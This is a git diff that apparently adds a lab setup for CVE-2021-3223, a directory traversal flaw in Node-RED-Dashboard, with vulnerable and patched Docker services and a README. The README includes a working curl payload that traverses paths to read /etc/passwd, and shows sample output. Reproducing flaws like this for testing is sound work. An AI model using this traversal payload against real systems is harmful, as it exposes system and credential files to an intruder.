diff --git a/nodejs/node-red/CVE-2021-3223/Dockerfile.safe b/nodejs/node-red/CVE-2021-3223/Dockerfile.safe new file mode 100644 index 00000000..5dce5640 --- /dev/null +++ b/nodejs/node-red/CVE-2021-3223/Dockerfile.safe @@ -0,0 +1,5 @@ +FROM nodered/node-red:1.1.2 + +RUN npm install --unsafe-perm --no-update-notifier --no-fund --only=production + +RUN npm install node-red-dashboard@2.26.2 diff --git a/nodejs/node-red/CVE-2021-3223/Dockerfile b/nodejs/node-red/CVE-2021-3223/Dockerfile.vuln similarity index 100% rename from nodejs/node-red/CVE-2021-3223/Dockerfile rename to nodejs/node-red/CVE-2021-3223/Dockerfile.vuln diff --git a/nodejs/node-red/CVE-2021-3223/README.md b/nodejs/node-red/CVE-2021-3223/README.md index d98ca35d..497a027e 100644 --- a/nodejs/node-red/CVE-2021-3223/README.md +++ b/nodejs/node-red/CVE-2021-3223/README.md @@ -4,3 +4,27 @@ This directory contains the deployment configs for a directory traversal vulnerability in Node-RED-Dashboard with node-red version (1.1.2). The deployed service has name `cve-2021-3223` and listens on port `1880`. + +## Docker Compose +``` +docker compose up +``` + +The vulnerable service will listen on port `8081` and the safe service will listen on port `8082`. + +## Confirming the vulnerability + + +``` +curl --path-as-is 'localhost:8081/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' +``` +Vulnerable output: +``` +root:x:0:0:root:/root:/bin/ash +bin:x:1:1:bin:/bin:/sbin/nologin +... +``` +Safe output (replace the port with 8082): +``` +Not Found +``` \ No newline at end of file diff --git a/nodejs/node-red/CVE-2021-3223/docker-compose.yml b/nodejs/node-red/CVE-2021-3223/docker-compose.yml new file mode 100644 index 00000000..f5d53c88 --- /dev/null +++ b/nodejs/node-red/CVE-2021-3223/docker-compose.yml @@ -0,0 +1,14 @@ +version: "3.9" + +services: + vuln: + build: + dockerfile: Dockerfile.vuln + ports: + - "8081:1880" + + safe: + build: + dockerfile: Dockerfile.safe + ports: + - "8082:1880" \ No newline at end of file